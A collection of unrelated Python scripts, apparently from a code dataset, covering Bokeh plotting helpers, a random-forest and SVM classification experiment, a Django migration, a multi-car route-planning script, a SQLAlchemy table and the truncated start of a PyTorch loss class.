line_dash=line_dash, legend=nm) plot.patch(np.hstack((x, x[::-1])), np.hstack(( ys.mean(axis=0)-ys.std(axis=0), (ys.mean(axis=0)+ys.std(axis=0))[::-1] )), color=color, line_width=linewidth/2, line_dash=line_dash, alpha=alpha, legend=nm) def plot_medianquartiles(plot, x, ys, color, linewidth, alpha, line_dash, name): ys25 = np.percentile(ys, 49, axis=0) ys50 = np.percentile(ys, 50, axis=0) ys75 = np.percentile(ys, 51, axis=0) plot.line(x, ys25, color=color, line_width=linewidth, line_dash=line_dash, legend=nm) plot.line(x, ys50, color=color, line_width=linewidth, line_dash=line_dash, legend=nm) plot.line(x, ys75, color=color, line_width=linewidth, line_dash=line_dash, legend=nm) #plot.patch(np.hstack((x, x[::-1])), np.hstack(( ys25, ys75[::-1] )), color=color, line_width=linewidth/2, line_dash=line_dash, alpha=alpha, legend=nm) def preprocess_plot(fig, axis_font_size, log_scale_x, log_scale_y): fig.xaxis.axis_label_text_font_size= axis_font_size fig.xaxis.major_label_text_font_size= axis_font_size fig.yaxis.axis_label_text_font_size= axis_font_size fig.yaxis.major_label_text_font_size= axis_font_size if log_scale_y: fig.yaxis.formatter = logFmtr if log_scale_x: fig.xaxis.formatter = logFmtr #fig.toolbar.logo = None #fig.toolbar_location = None def postprocess_plot(fig, legend_font_size, orientation='vertical', location='top_right', glyph_width=80): fig.legend.label_text_font_size= legend_font_size fig.legend.orientation=orientation fig.legend.location=location fig.legend.glyph_width=glyph_width fig.legend.glyph_height=40 fig.legend.spacing=5 fig.xgrid.grid_line_color=None fig.ygrid.grid_line_color=None
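# Typical usage sketch (assumes an already populated bokeh figure; the data names
# mup, Sigp and Sig below are illustrative numpy arrays, not defined here):
#
#   from bokeh.plotting import figure
#   fig = figure(x_axis_type='log')
#   preprocess_plot(fig, axis_font_size='12pt', log_scale_x=True, log_scale_y=False)
#   plot_gaussian(fig, mup, Sigp, Sig, pal[0], dotsize=8, linewidth=2,
#                 dotalpha=0.8, linealpha=0.8, line_dash='solid', name='posterior')
#   postprocess_plot(fig, legend_font_size='10pt', orientation='horizontal')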
nilq/baby-python
python
from sklearn.kernel_approximation import (RBFSampler,Nystroem) from sklearn.ensemble import RandomForestClassifier import pandas import numpy as np import random from sklearn.svm import SVC from sklearn.metrics.pairwise import rbf_kernel,laplacian_kernel,chi2_kernel,linear_kernel,polynomial_kernel,cosine_similarity from sklearn import preprocessing from sklearn.model_selection import GridSearchCV import xlrd import xlrd import numpy as np import pandas import random import time from sklearn.metrics import accuracy_score from sklearn import model_selection from sklearn.ensemble import RandomForestClassifier from sklearn.feature_selection import RFE from sklearn.svm import SVC from sklearn.externals import joblib from sklearn.pipeline import make_pipeline from skrebate import ReliefF from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.metrics import roc_auc_score from sklearn.neighbors import KNeighborsClassifier from sklearn.model_selection import GridSearchCV from sklearn import preprocessing from collections import Counter import re from math import floor from joblib import Parallel, delayed np.set_printoptions(threshold=np.nan) def floored_percentage(val, digits): val *= 10 ** (digits + 2) return '{1:.{0}f}\%\pm '.format(digits, floor(val) / 10 ** digits) def splitdata(X,Y,ratio,seed): '''This function is to split the data into train and test data randomly and preserve the pos/neg ratio''' n_samples = X.shape[0] y = Y.astype(int) y_bin = np.bincount(y) classes = np.nonzero(y_bin)[0] #fint the indices for each class indices = [] print() for i in classes: indice = [] for j in range(n_samples): if y[j] == i: indice.append(j) #print(len(indice)) indices.append(indice) train_indices = [] for i in indices: k = int(len(i)*ratio) train_indices += (random.Random(seed).sample(i,k=k)) #find the unused indices s = np.bincount(train_indices,minlength=n_samples) mask = s==0 test_indices = np.arange(n_samples)[mask] return train_indices,test_indices """ def rf_dis(n_trees, X,Y,train_indices,test_indices,seed,wei): clf = RandomForestClassifier(n_estimators=n_trees, random_state=seed, oob_score=False, n_jobs=1) clf = clf.fit(X[train_indices], Y[train_indices]) pred = clf.predict(X[test_indices]) prediction = clf.predict(X) prob = clf.predict_proba(X[test_indices]) weight =0#clf.oob_score_ #clf.score(X[test_indices], Y[test_indices]) #print(clf.score(X[train_indices], Y[train_indices])) #print(1 - clf.oob_score_) n_samples = X.shape[0] trees = clf.estimators_ dis = np.zeros((n_samples,n_samples)) for i in range(n_samples): dis[i][i] = 1 res = clf.apply(X) www = wei pre = np.zeros((n_trees, n_samples)) pre = pre.transpose() for i in range(n_samples): for j in range(i+1,n_samples): a = np.ravel(res[i]) b = np.ravel(res[j]) c = np.ravel(pre[i]) d = np.ravel(pre[j]) score = 0 for k in range(n_trees): if a[k] == b[k]: s1=1 else: s1 = 0 if c[k] == d[k]: s2=1 else: s2 = 0 s = s1*www + s2*(1-www) score = score + s dis[i][j] =dis[j][i] = score/n_trees X_features1 = np.transpose(dis) X_features2 = X_features1[train_indices] X_features3 = np.transpose(X_features2) return X_features3[train_indices],X_features3[test_indices],weight,pred,prob,clf """ def rf_dis(n_trees, X,Y,train_indices,test_indices,seed, wei): clf = RandomForestClassifier(n_estimators=500, random_state=seed, oob_score=True, n_jobs=1) clf = clf.fit(X[train_indices], Y[train_indices]) pred = clf.predict(X[test_indices]) prob = clf.predict_proba(X[test_indices]) weight =clf.oob_score_ #clf.score(X[test_indices], 
Y[test_indices]) #print(1 - clf.oob_score_) n_samples = X.shape[0] dis = np.zeros((n_samples,n_samples)) trees = clf.estimators_ www = wei for i in range(n_samples): dis[i][i] = 1 for k in range(len(trees)): pa = trees[k].decision_path(X) for i in range(n_samples): for j in range(i+1,n_samples): a = pa[i] a = a.toarray() a = np.ravel(a) b = pa[j] b = b.toarray() b = np.ravel(b) score = a == b d = score.sum()-len(a) dis[i][j] = dis[j][i] = dis[i][j]+np.exp(www*d) dis = dis/n_trees X_features1 = np.transpose(dis) X_features2 = X_features1[train_indices] X_features3 = np.transpose(X_features2) return X_features3[train_indices],X_features3[test_indices],weight,pred,prob,clf def gama_patatune(train_x,train_y,c): tuned_parameters = [ {'kernel': ['rbf'], 'gamma': [0.0625, 0.125,0.25, 0.5, 1, 2, 5 ,7, 10, 12 ,15 ,17 ,20] }] clf = GridSearchCV(SVC(C=c), tuned_parameters, cv=5, n_jobs=1 ) # SVC(probability=True)#SVC(kernel="linear", probability=True) clf.fit(train_x, train_y) return clf.best_params_['gamma'] def relf(n_neb, n_feat, trainx, trainy,testx): fs = ReliefF(n_features_to_select=n_feat, n_neighbors=n_neb,discrete_threshold=10, n_jobs=1) fs.fit(trainx, trainy) ind = fs.transform(trainx) return ind def lsvm_rfe(c,n_feat,trainX,trainy, testX): svc = SVC(kernel="linear", C=c) rfe = RFE(estimator=svc, n_features_to_select=n_feat, step=1) rfe.fit(trainX, trainy) train_X = rfe.transform(trainX) test_X = rfe.transform(testX) return train_X,test_X def RF(n_trees, seed, train_x, train_y, test_x, test_y): clf = RandomForestClassifier(n_estimators=n_trees, random_state = seed, oob_score=True) clf = clf.fit(train_x,train_y) oob_error = 1 - clf.oob_score_ test_error = clf.score(test_x,test_y) test_auc = clf.predict_proba(test_x) #filename = './tmp1/RF_%d_.pkl'%seed #_ = joblib.dump(clf, filename, compress=9) return test_error, test_auc def selected_f(n_features): if n_features>1000: n = 25 elif n_features>100: n = int(n_features*0.03) elif n_features >75: n = int(n_features * 0.1) else : n = int(n_features * 0.4) return n def nLsvm_patatune(train_x,train_y,test_x, test_y): tuned_parameters = [ {'kernel': ['precomputed'], 'C': [0.01, 0.1, 1, 10, 100, 1000]}] clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5, n_jobs=1 ) # SVC(probability=True)#SVC(kernel="linear", probability=True) clf.fit(train_x, train_y) #print(clf.score(test_x,test_y)) return clf.best_params_['C'] def Lsvm_patatune(train_x,train_y): tuned_parameters = [ {'kernel': ['linear'], 'C': [0.01,0.1, 1, 10, 100, 1000]}] clf = GridSearchCV(SVC(C=1, probability=True), tuned_parameters, cv=5, n_jobs=1 ) # SVC(probability=True)#SVC(kernel="linear", probability=True) clf.fit(train_x, train_y) return clf.best_params_['C'] def weightedComb(Y, W): y = Y.astype(int) y_bin = np.bincount(y) classes = np.nonzero(y_bin)[0] # fint the indices for each class indices = [] for i in classes: pro = 0 indice = [] for j in range(len(y)): if y[j] == i: indice.append(j) pro = pro + W[j] indices.append(pro) ind = (list(indices)).index(max(indices)) return classes[ind] url = 'text_pr_1.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X = array Y = pandas.read_csv('label_progression.csv', header=None) Y = Y.values Y = np.ravel(Y) print(Y.shape) for i in range(4): url = 'text_pr_' + str(i + 2) + '.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X1 = array print(X1.shape) X = np.concatenate((X, X1), axis=1) Progression = X Progression1 = X[:, 0:1680] Progression2 = X[:, 1680:3360] Progression3 = X[:, 3360:5040] 
Progression4 = X[:, 5040:6720] Progression5 = X[:, 6720:6745] ProgressionY = Y url = 'text_lg_1.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X = array Y = pandas.read_csv('label_lowGrade.csv', header=None) Y = Y.values Y = np.ravel(Y) print(Y.shape) for i in range(4): url = 'text_lg_' + str(i + 2) + '.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X1 = array print(X1.shape) X = np.concatenate((X, X1), axis=1) lowGrade = X lowGrade1 = X[:, 0:1680] lowGrade2 = X[:, 1680:3360] lowGrade3 = X[:, 3360:5040] lowGrade4 = X[:, 5040:6720] lowGrade5 = X[:, 6720:6745] lowGradeY = Y url = 'text_nonIDH1_1.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X = array Y = pandas.read_csv('label_nonIDH1.csv', header=None) Y = Y.values Y = np.ravel(Y) print(Y.shape) for i in range(4): url = 'text_nonIDH1_' + str(i + 2) + '.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X1 = array print(X1.shape) X = np.concatenate((X, X1), axis=1) nonIDH=X nonIDH1 = X[:, 0:1680] nonIDH2 = X[:, 1680:3360] nonIDH3 = X[:, 3360:5040] nonIDH4 = X[:, 5040:6720] nonIDH5 = X[:, 6720:6745] nonIDHY = Y url = 'text_id_1.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X = array Y = pandas.read_csv('label_IDHCodel.csv', header=None) Y = Y.values Y = np.ravel(Y) print(Y.shape) for i in range(4): url = 'text_id_' + str(i + 2) + '.csv' dataframe = pandas.read_csv(url, header=None) array = dataframe.values X1 = array print(X1.shape) X = np.concatenate((X, X1), axis=1) IDHCodel=X IDHCodel1 = X[:, 0:1680] IDHCodel2 = X[:, 1680:3360] IDHCodel3 = X[:, 3360:5040] IDHCodel4 = X[:, 5040:6720] IDHCodel5 = X[:, 6720:6745] IDHCodelY = Y def mcode(ite): R = 0.5 seed = 1000 + ite numberofclass = 2 for ddd in range(4): if ddd ==0: X = IDHCodel Y = IDHCodelY fff = "SPBKNDIDHCodelwww4%f_%f" % (R, ite) if ddd ==1: X = nonIDH Y = nonIDHY fff = "SPBKNDnonIDHwww4%f_%f" % (R, ite) if ddd ==2: X = lowGrade Y = lowGradeY fff = "SPBKNDLGwww4%f_%f" % (R, ite) if ddd ==3: X = Progression Y = ProgressionY fff ="SPBKNDprwww4%f_%f" % (R, ite) Xnew1 = X[:, 0:1680] Xnew2 = X[:, 1680:3360] Xnew3 = X[:, 3360:5040] Xnew4 = X[:, 5040:6720] Xnew5 = X[:, 6720:6745] train_indices, test_indices = splitdata(X=X, Y=Y, ratio=R, seed=seed) for ii in range(20): fn = fff+"ite%d"%(ii)+".txt" testfile = open(fn, 'w') ndw = 0.1*(ii+1) X_features_train1, X_features_test1, w1, pred1, prob1, RFV1 = rf_dis(n_trees=500, X=Xnew1, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) X_features_train2, X_features_test2, w2, pred2, prob2, RFV2 = rf_dis(n_trees=500, X=Xnew2, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) X_features_train3, X_features_test3, w3, pred3, prob3, RFV3 = rf_dis(n_trees=500, X=Xnew3, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) X_features_train4, X_features_test4, w4, pred4, prob4, RFV4 = rf_dis(n_trees=500, X=Xnew4, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) X_features_train5, X_features_test5, w5, pred5, prob5, RFV5 = rf_dis(n_trees=500, X=Xnew5, Y=Y, train_indices=train_indices, test_indices=test_indices, seed=seed, wei=ndw) # multi view X_features_trainm = ( X_features_train1 + X_features_train2 + X_features_train3 + X_features_train4 + X_features_train5) / 5 X_features_testm = ( X_features_test1 + X_features_test2 + X_features_test3 + X_features_test4 + X_features_test5) / 5 mv = 
RandomForestClassifier(n_estimators=500, random_state=seed, oob_score=True, n_jobs=1).fit( X_features_trainm, Y[train_indices]) R1=(mv.score(X_features_testm, Y[test_indices])) # RFSVM c = nLsvm_patatune(train_x=X_features_trainm, train_y=Y[train_indices], test_x=X_features_testm, test_y=Y[test_indices]) clf = SVC(C=c, kernel='precomputed') clf.fit(X_features_trainm, Y[train_indices]) R2=(clf.score(X_features_testm, Y[test_indices])) """ # W multi view X_features_trainm = ( X_features_train1*W[0] + X_features_train2*W[1] + X_features_train3*W[2] + X_features_train4*W[3] + X_features_train5*W[4]) / 5 X_features_testm = ( X_features_test1*W[0] + X_features_test2*W[1] + X_features_test3*W[2] + X_features_test4*W[3] + X_features_test5*W[4]) / 5 mv = RandomForestClassifier(n_estimators=500, random_state=seed, oob_score=True, n_jobs=1).fit( X_features_trainm, Y[train_indices]) R3=(mv.score(X_features_testm, Y[test_indices])) # RFSVM c = nLsvm_patatune(train_x=X_features_trainm, train_y=Y[train_indices], test_x=X_features_testm, test_y=Y[test_indices]) clf = SVC(C=c, kernel='precomputed') clf.fit(X_features_trainm, Y[train_indices]) R4=(clf.score(X_features_testm, Y[test_indices])) # weight multi view X_features_trainm = ( X_features_train1 * weight[0] + X_features_train2 * weight[1] + X_features_train3 * weight[ 2] + X_features_train4 * weight[3] + X_features_train5 * weight[4]) / 5 X_features_testm = ( X_features_test1 * weight[0] + X_features_test2 * weight[1] + X_features_test3 * weight[ 2] + X_features_test4 * weight[3] + X_features_test5* weight[4]) / 5 mv = RandomForestClassifier(n_estimators=500, random_state=seed, oob_score=True, n_jobs=1).fit( X_features_trainm, Y[train_indices]) R5=(mv.score(X_features_testm, Y[test_indices])) # RFSVM c = nLsvm_patatune(train_x=X_features_trainm, train_y=Y[train_indices], test_x=X_features_testm, test_y=Y[test_indices]) clf = SVC(C=c, kernel='precomputed') clf.fit(X_features_trainm, Y[train_indices]) R6=(clf.score(X_features_testm, Y[test_indices])) """ testfile.write(" R1&%s pm%s &" % (floored_percentage(np.mean(R1), 2), floored_percentage(np.std(R1), 2)) + '\n') testfile.write(" R2&%s pm%s &" % (floored_percentage(np.mean(R2), 2), floored_percentage(np.std(R2), 2)) + '\n') #testfile.write(" R3&%s pm%s &" % (floored_percentage(np.mean(R3), 2), floored_percentage(np.std(R3), 2)) + '\n') #testfile.write(" R4&%s pm%s &" % (floored_percentage(np.mean(R4), 2), floored_percentage(np.std(R4), 2)) + '\n') #testfile.write(" R5&%s pm%s &" % (floored_percentage(np.mean(R5), 2), floored_percentage(np.std(R5), 2)) + '\n') #testfile.write(" R6&%s pm%s &" % (floored_percentage(np.mean(R6), 2), floored_percentage(np.std(R6), 2)) + '\n') testfile.close() if __name__ == '__main__': Parallel(n_jobs=10)(delayed(mcode)(ite=i) for i in range(10))
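
# Editor's note: the rf_dis() helper above builds a pairwise dissimilarity from
# shared decision paths with an exponential per-depth weight, using three nested
# Python loops. The function below is a minimal, illustrative sketch (not part of
# the original pipeline) of the classic random-forest proximity: the fraction of
# trees in which two samples fall into the same leaf. It reuses the numpy import
# from this script and the standard scikit-learn forest API; the function name is
# hypothetical and it is never called.
def rf_proximity_sketch(forest, X):
    # leaf index of every sample in every tree, shape (n_samples, n_trees)
    leaves = forest.apply(X)
    n_samples, n_trees = leaves.shape
    prox = np.zeros((n_samples, n_samples))
    for t in range(n_trees):
        # boolean matrix: do samples i and j share a leaf in tree t?
        same_leaf = leaves[:, t][:, None] == leaves[:, t][None, :]
        prox += same_leaf
    prox /= n_trees
    return 1.0 - prox  # proximity turned into a dissimilarity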
nilq/baby-python
python
# Generated by Django 3.0.8 on 2020-08-29 14:04 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('bugtrack', '0014_user_notification'), ] operations = [ migrations.AddField( model_name='bug', name='notifType', field=models.CharField(blank=True, default='none', max_length=50, null=True), ), ]
nilq/baby-python
python
# -*- coding: utf-8 -*- import shutil import locm, routem, mapm, dropboxm, gmaps, tools, bokehm, tspm import logging.config, os, yaml, inspect import time, math import numpy as np tver_coords = {u'lat':56.8583600,u'lng':35.9005700} ryazan_coords = {u'lat':54.6269000,u'lng':39.6916000} def setup_logging( default_path='app_logging.yaml', default_level=logging.INFO, env_key='LOG_CFG' ): """Setup logging configuration """ path = default_path value = os.getenv(env_key, None) if value: path = value if os.path.exists(path): with open(path, 'rt') as f: config = yaml.load(f.read()) logging.config.dictConfig(config) else: logging.basicConfig(level=default_level) def get_tsp_params_list(cities_coords_fname): # setting up tsp module move_operator_name = "swapped_cities" max_itterations = 10000 # test value # max_itterations = 1000000 # best value alg_type = "anneal" start_temp = 100 # best value alpha = 0.99 # best value cooling_str = ''.join([str(start_temp),':',str(alpha)]) cities_coords_fname = cities_coords_fname tsp_params_list = ['tspm.py','-m',move_operator_name,'-n',max_itterations,'-a',alg_type,'--cooling',cooling_str,cities_coords_fname] return tsp_params_list def generate_locations(cities_fname): with open(cities_fname,'r') as cities_file: address_list = [line.strip() for line in cities_file.readlines()] locs_list = [locm.Location(addr) for addr in address_list] moscow = locm.Location(address='Moscow') nodes_coords_list = [tver_coords] + [loc.coords for loc in locs_list] + [ryazan_coords] # nodes_coords_list = [moscow.coords] + [loc.coords for loc in locs_list] + [moscow.coords] return locs_list, nodes_coords_list def put_locs_to_file(nodes_coords_list, fname): with open(fname,'w') as coords_file: for coord_pair_dict in nodes_coords_list: coords_file.write("%f" % coord_pair_dict[u'lat']) coords_file.write(',') coords_file.write("%f" % coord_pair_dict[u'lng']) coords_file.write("\n") def read_coords_from_file(fname): with open(fname,'r') as coords_file: nodes_coords_list_of_lists = [line.strip().split(',') for line in coords_file] nodes_coords_list = [{u'lat':float(l[0]),u'lng':float(l[1])}for l in nodes_coords_list_of_lists] return nodes_coords_list def try_to_guess_routes(): cities_fname = 'test_city_names_list_100.txt' # cities_fname = 'test_city_names_list_21.txt' # cities_fname = 'test_city_names_list.txt' # cities_fname = 'cities_from_dropbox.txt' FILE_WITH_COORDS_PAIRS_NAME = "cities_coords.txt" moscow = locm.Location(address='Moscow') ## run this when need to update cities coords / change cities list # locs_list, nodes_coords_list = generate_locations() # put_locs_to_file(nodes_coords_list,fname = FILE_WITH_COORDS_PAIRS_NAME) ## routes_list = [routem.Route(moscow.coords,dest.coords) for dest in locs_list] ## for route,loc in zip(routes_list,locs_list): ## print(loc.address) ## print(route.to_str()) # run this to only prepare the tsp test nodes_coords_list = read_coords_from_file(FILE_WITH_COORDS_PAIRS_NAME) # only variable nodes` coords here tsp_params_list = get_tsp_params_list(FILE_WITH_COORDS_PAIRS_NAME) import sys logger.error("max_itterations = %d" % (tsp_params_list[4])) sys.argv = tsp_params_list result_tuple = tspm.main() locs_coords_list = [nodes_coords_list[index] for index in result_tuple[-1]] plot_fname = 'othodi_app_test_%d_%f.html' % (len(nodes_coords_list),result_tuple[1]) fig_on_gmap = bokehm.Figure(output_fname=plot_fname,use_gmap=True, center_coords=nodes_coords_list[0]) # fig_on_gmap.add_line(locs_coords_list,circle_size=1, circles_color='red',alpha=1.) 
# fig_on_gmap.add_line([nodes_coords_list[0]],circle_size=35, circles_color='green',alpha=0.5) # fig_on_gmap.save2html() # fig_on_gmap.show() cars_num = 5 # # cities_num=100 only_var_nodes = locs_coords_list[1:-1] cities_num=(len(only_var_nodes)) cities_per_car = cities_num//cars_num print("cities_per_car=%d" % cities_per_car) parts = [only_var_nodes[car_i*cities_per_car : (car_i+1)*cities_per_car] for car_i in range(cars_num)] parts_indeces = [range(car_i*cities_per_car,(car_i+1)*cities_per_car,1) for car_i in range(cars_num)] # print(parts_indeces) # print(parts) best_scores_list = [] best_routes_list = [] colors_list = ["red","green","blue","orange","pink"] # parts_with_start_finish = [[nodes_coords_list[0]] + part + [nodes_coords_list[-1]] for part in parts] put_locs_to_file(locs_coords_list[1:-1],fname = "cities_coords_all_in_order.txt") for i,part in enumerate(parts): part_coords_file_name = "cities_coords_part_%d.txt" % (i) put_locs_to_file(part,fname = part_coords_file_name) logger.info("reading var nodes` coords from file - one car route evaluation") nodes_coords_list = read_coords_from_file(part_coords_file_name) # only variable nodes` coords here tsp_params_list = get_tsp_params_list(part_coords_file_name) import sys sys.argv = tsp_params_list logger.info("starting part route evaluation") result_tuple = tspm.main() logger.info("preparing list of dicts of coords for plotting") locs_coords_list = [tver_coords]+[nodes_coords_list[index] for index in result_tuple[-1]] + [ryazan_coords] # locs_coords_list = [moscow.coords]+[nodes_coords_list[index] for index in result_tuple[-1]]+[moscow.coords] # fig_on_gmap = bokehm.Figure(output_fname='o_part_%d_ncities_%d_%f.html' % (i,len(part),result_tuple[1]),use_gmap=True, center_coords=nodes_coords_list[0]) circle_sizes = [(i*3) for index in locs_coords_list] fig_on_gmap.add_line(locs_coords_list,circle_size=circle_sizes, circles_color=colors_list[i],alpha=0.5) # fig_on_gmap.add_line([nodes_coords_list[0]],circle_size=35, circles_color=colors_list[i],alpha=0.5) logger.error("a car route: part %d ncities=%d length=%f" % (i,len(part),result_tuple[1])) best_scores_list.append(result_tuple[1]) best_routes_list.append(result_tuple[-1]) fig_on_gmap.save2html() return best_scores_list,best_routes_list,plot_fname def r(c1,c2): def convert(c): if type(c)!=type({}): return {'lat':c[0],'lng':c[1]} return c c1,c2 = convert(c1),convert(c2) return math.sqrt((c2['lat']-c1['lat'])**2 + (c2['lng']-c1['lng'])**2) def create_potential_list(coords_tuples,start_coords,finish_coords): '''create a potential list for every city''' potential_list=[] xs,xf = start_coords['lat'],finish_coords['lat'] ys,yf = start_coords['lng'],finish_coords['lng'] for i,(x,y) in enumerate(coords_tuples): dxs,dys=x-xs,y-ys dxf,dyf=xf-x,yf-y potential=math.sqrt(dxs*dxs + dys*dys)+math.sqrt(dxf*dxf + dyf*dyf) potential_list.append(potential) return potential_list def create_coords_dicts_lists(node_dtype_routes): coords_dicts_lists = np.empty(node_dtype_routes.shape,dtype = [('lat',np.float64,1),('lng',np.float64,1)]) for route_n, part in enumerate(node_dtype_routes['coords']): coords_dicts_lists[route_n]['lat'] = [pair[0] for pair in part] coords_dicts_lists[route_n]['lng'] = [pair[1] for pair in part] return coords_dicts_lists if __name__ == "__main__": setup_logging() logger = logging.getLogger(__name__) func_name, func_args = inspect.stack()[0][3], inspect.getargvalues(inspect.currentframe())[3] # caller_name, func_name, func_args = inspect.stack()[1][3], inspect.stack()[0][3], 
    inspect.getargvalues(inspect.currentframe())[3]
    logger.debug(" %s with args = %s" % (func_name, func_args))
    logger.info("Main script started")

    CITIES_FNAME = 'test_city_names_list_100.txt'
    with open(CITIES_FNAME,'r') as cities_file:
        names = [addr.strip() for addr in cities_file.readlines()]
        # locs_list = [locm.Location(addr.strip()) for addr in cities_file.readlines()]
    # nodes_coords_list = [loc.coords for loc in locs_list]
    FILE_WITH_COORDS_PAIRS_NAME = "c_pairs_"+CITIES_FNAME
    # put_locs_to_file(nodes_coords_list,fname = FILE_WITH_COORDS_PAIRS_NAME)
    nodes_clist = read_coords_from_file(FILE_WITH_COORDS_PAIRS_NAME) # only variable nodes` coords here

    # calc potential
    nodes_clist_of_tuples = [tuple(d.values()) for d in nodes_clist]
    cm = tspm.cartesian_matrix(nodes_clist_of_tuples)
    r_to_start_list = [r(tver_coords,node_cd) for node_cd in nodes_clist]

    # build the unsorted list of city/node points
    unsorted_nodes = []
    pl = create_potential_list(nodes_clist_of_tuples,tver_coords,ryazan_coords)
    for pot, name,i,c_dict,r_s in zip(pl,names,range(len(names)),nodes_clist,r_to_start_list):
        # print("%d:%s %.3f %s" % (i,name, pot,str(c_dict)))
        if len(name)!=0 and pot!=0 and len(c_dict)!=0:
            unsorted_nodes.append((i,name,pot,c_dict.values(),r_s))

    # build and sort the list of nodes with their potentials
    node_dtype = dt = np.dtype([('idx', np.int32, 1), ('name',np.str_, 16), ('potential', np.float64, 1), ('coords', np.float64, 2),('rs',np.float64,1)])
    pln = np.array(unsorted_nodes,dtype = node_dtype)
    pln.sort(order = 'potential') # sorted by potential

    # split the sorted list into parts of increasing potential
    n_cars = 5
    n_nodes = len(pln)
    n_per_route = n_nodes//n_cars
    splitted_pln = np.split(pln,n_per_route)
    # print(splitted_pln[0])

    # build a route thread for each car
    car_routes = np.empty((n_cars,n_per_route),dtype = node_dtype)
    for part_num, split_part in enumerate(splitted_pln):
        next_nodes = np.copy(split_part)
        print("next_nodes before sorting by proximity to prev node")
        print(next_nodes)
        next_nodes_arb_rs = []
        for node in next_nodes:
            next_nodes_arb_rs.append(r(car_routes[car_number][part_num-1]['coords'],node['coords']))
        next_nodes['rs'] = next_nodes_arb_rs
        next_nodes.sort(order = 'rs')
        print("next_nodes after sorting by proximity to prev node")
        print(next_nodes)
        for car_number in range(n_cars):
            print("car number %d" % car_number)
            if part_num == 0: # first, just in order
                car_routes[car_number][part_num] = split_part[car_number]
            else: # then the nearest node from each "equipotential" part
                car_routes[car_number][part_num] = next_nodes[0]
                # restore the rs field so the route can be ordered by distance from the start point
                car_routes[car_number][part_num]['rs'] = split_part[0]['rs']

    # print(car_routes[0])
    print(len(car_routes[0]))
    print(len(car_routes[1]))
    print(len(car_routes[2]))
    print(len(car_routes[3]))
    print(len(car_routes[4]))
    # print(car_routes['coords'][0][:,0])
    # print(car_routes['coords'][0][:,1])
    # print(r(tver_coords,ryazan_coords))
    # print(r(tver_coords,car_routes['coords'][0][0]))
    # print(car_routes['rs'])
    for car_route in car_routes:
        car_route.sort(order = 'rs')
    # print(car_routes['rs'])

    routes_coords_dicts_lists = create_coords_dicts_lists(car_routes)

    moscow = locm.Location(address='Moscow')
    fig_on_gmap = bokehm.Figure(output_fname='threads_pot_sorted_nearest.html',use_gmap=True, center_coords=moscow.coords)
    circle_sizes = 10
    colors_list = ['red','green','blue','orange','yellow']
    for car_number in range(n_cars):
fig_on_gmap.add_line(routes_coords_dicts_lists[car_number],circle_size=circle_sizes, circles_color=colors_list[car_number],alpha=1.) fig_on_gmap.show() import sys sys.exit(0) # t_start = time.time() # best_scores,nearest_routes,plot_file_name = [],[],"" # # stdev_of_length = 10. # # mean_length = -100. # while True: # best_scores,nearest_routes,plot_file_name = try_to_guess_routes() # arr = np.array(best_scores) # logger.error("mean_best_score = %.4f +- %.4f" % (float(np.mean(arr, axis=0)), float(np.std(arr, axis=0)))) # stdev_of_length=float(np.std(arr, axis=0)) # mean_length=float(np.mean(arr, axis=0)) # if stdev_of_length<1. and mean_length>-10.: break # t_stop = time.time() # delta_t = t_stop - t_start # logger.error("route with small stdev plotted: %s, time elapsed=%.2f seconds" % (plot_file_name,delta_t))
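
# Editor's note: small illustration (not part of the original script) of the
# helper functions defined above. Points whose summed distance to the start and
# finish is equal lie on the same ellipse, which is what the "equipotential"
# split in the main block relies on. For reference only; never called.
def _potential_illustration():
    start, finish = {'lat': 0.0, 'lng': 0.0}, {'lat': 4.0, 'lng': 0.0}
    pts = [(2.0, 1.5), (2.0, -1.5)]  # mirror images across the start-finish axis
    print(create_potential_list(pts, start, finish))  # -> [5.0, 5.0]
    print(r(start, finish))  # -> 4.0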
nilq/baby-python
python
# -*- coding: utf-8 -*- """ In the test, we assume: - id_col: id, string, generated by ``import uuid`` - sort_col: time, datetime """ from __future__ import division from sqlalchemy import MetaData, Table, Column from sqlalchemy import String, DateTime table_name = "events" id_col_name = "id" sort_col_name = "time" metadata = MetaData() t_events = Table( table_name, metadata, Column(id_col_name, String), Column(sort_col_name, DateTime), )
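
# Editor's note: a minimal usage sketch (not part of the original module) showing
# how the table above could be created and populated in a test. The in-memory
# SQLite URL and the sample row are illustrative assumptions.
if __name__ == "__main__":
    import uuid
    from datetime import datetime

    from sqlalchemy import create_engine

    engine = create_engine("sqlite:///:memory:")
    metadata.create_all(engine)
    with engine.begin() as conn:
        conn.execute(
            t_events.insert(),
            [{"id": str(uuid.uuid4()), "time": datetime.utcnow()}],
        )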
nilq/baby-python
python
import time import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import chamfer from torch.autograd import Function from util.sampler import sampler, sampler_color, sampler_uv, uv2color from torch.autograd import Variable class RGBPriorLoss(nn.Module): def __init__(self, options): super(RGBPriorLoss, self).__init__() self.options = options self.chamfer_dist = ChamferDist() self.delta_vc = None self.meshes = self.mesh = None self.pred_texture = None self.device = None self.pred_vc = [] self.pre_uvs = [] self.vc_gt = None self.pred_coord = [] self.w_chamfer = options.weight_chamfer self.w_chamfer_op = options.weight_chamfer_opposite self.l2_loss = nn.MSELoss(reduction='mean') self.part_n = None def forward(self, output, targets, faces_gt, colors, hr_texture, lr_texture, gt_texture, uvs_gt, face_uvs_gt): self.pred_texture = hr_texture[0] consistent_loss = edge_loss = texture_chamfer_loss = lap_loss = beam_loss = area_loss = 0 # for i,mesh in enumerate(self.meshes): self.mesh = np.asarray([self.meshes[self.part_n]]) self.delta_vc = self.delta_e2c(output) pred_coord = torch.tensor(self.mesh[0].vs, dtype=torch.float, device=self.device) if colors is not None else None uvs_gt = torch.tensor(uvs_gt[self.part_n], dtype=torch.float, device=self.device) if uvs_gt is not None else None face_uvs_gt = torch.tensor(face_uvs_gt[self.part_n], 